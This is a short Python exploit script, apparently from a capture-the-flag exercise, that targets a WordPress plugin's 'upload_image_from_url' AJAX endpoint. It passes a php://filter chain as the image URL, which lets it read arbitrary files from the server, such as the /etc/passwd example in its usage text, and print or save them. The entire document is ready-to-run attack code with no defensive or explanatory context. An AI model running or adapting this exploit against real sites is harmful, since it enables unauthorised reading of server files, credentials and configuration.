import sys
import requests
import base64
import urllib.parse


def leak(url, path, out_file=None):
    data = {
        "action": "upload_image_from_url",
        "url": urllib.parse.quote(f"php://filter/convert.base64-encode/convert.iconv.utf-16be.utf-32be/resource={path}"),
        "id": 1,
        "accepted_files": ",image/vnd.wap.wbmp",
    }

    response = requests.post(f"{url}/wp-admin/admin-ajax.php", data=data, verify=False)

    response = response.json()
    if response["status"] != "OK":
        print(f'Got error {response["response"]}')
        print("Maybe the file does not exist?")
    else:
        data = base64.b64decode(requests.get(response["response"]).content.replace(b"\0", b""))
        if out_file is not None:
            with open(out_file, 'wb') as f:
                f.write(data)
        else:
            print(data.decode())


if __name__ == "__main__":
    if len(sys.argv) not in [3, 4]:
        print(f"Usage: {sys.argv[0]} URL FILE_TO_LEAK [OUT_FILE]")
        print(f"  Example: {sys.argv[0]} http://vulnsite.ctf:80/wp/ /etc/passwd")
    else:
        leak(sys.argv[1], sys.argv[2], sys.argv[3] if len(sys.argv) == 4 else None)